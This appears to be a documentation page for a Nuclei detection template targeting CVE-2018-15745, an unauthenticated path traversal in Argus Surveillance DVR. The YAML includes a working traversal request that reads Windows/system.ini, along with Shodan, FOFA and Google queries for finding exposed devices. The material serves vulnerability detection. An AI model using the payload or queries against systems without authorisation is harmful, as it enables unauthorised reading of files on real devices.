Argus Surveillance DVR 4.0.0.0 - Local File Inclusion
ID: CVE-2018-15745
Severity: high
Author: gy741
Tags: cve,cve2018,packetstorm,edb,argussurveillance,lfi,dvr
Description
Section titled “Description”Argus Surveillance DVR 4.0.0.0 devices allow unauthenticated local file inclusion, leading to file disclosure via a ..%2F in the WEBACCOUNT.CGI RESULTPAGE parameter.
YAML Source
Section titled “YAML Source”id: CVE-2018-15745
info: name: Argus Surveillance DVR 4.0.0.0 - Local File Inclusion author: gy741 severity: high description: | Argus Surveillance DVR 4.0.0.0 devices allow unauthenticated local file inclusion, leading to file disclosure via a ..%2F in the WEBACCOUNT.CGI RESULTPAGE parameter. impact: | An attacker can exploit this vulnerability to read sensitive files on the server. remediation: | Upgrade to a patched version of Argus Surveillance DVR. reference: - http://hyp3rlinx.altervista.org/advisories/ARGUS-SURVEILLANCE-DVR-v4-UNAUTHENTICATED-PATH-TRAVERSAL-FILE-DISCLOSURE.txt - http://packetstormsecurity.com/files/149134/Argus-Surveillance-DVR-4.0.0.0-Directory-Traversal.html - https://www.exploit-db.com/exploits/45296/ - https://nvd.nist.gov/vuln/detail/CVE-2018-15745 - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2018-15745 cwe-id: CWE-22 epss-score: 0.92562 epss-percentile: 0.98989 cpe: cpe:2.3:a:argussurveillance:dvr:4.0.0.0:*:*:*:*:*:*:* metadata: max-request: 1 vendor: argussurveillance product: dvr shodan-query: http.title:"web viewer for samsung dvr" fofa-query: title="web viewer for samsung dvr" google-query: intitle:"web viewer for samsung dvr" tags: cve,cve2018,packetstorm,edb,argussurveillance,lfi,dvr
http: - method: GET path: - "{{BaseURL}}/WEBACCOUNT.CGI?OkBtn=++Ok++&RESULTPAGE=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2FWindows%2Fsystem.ini&USEREDIRECT=1&WEBACCOUNTID=&WEBACCOUNTPASSWORD="
matchers-condition: and matchers: - type: word part: body words: - "for 16-bit app support" - "[drivers]" condition: and
- type: status status: - 200# digest: 4a0a00473045022100bb4b9bd667516e9199738fcae043f84b4f6c2fd37f90c951ed9946096ebea8a502203ab3186841c32745cb6e8f45a5b1147a50a2c63b3ebe6c37f299315ef1ac6925:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2018/CVE-2018-15745.yaml"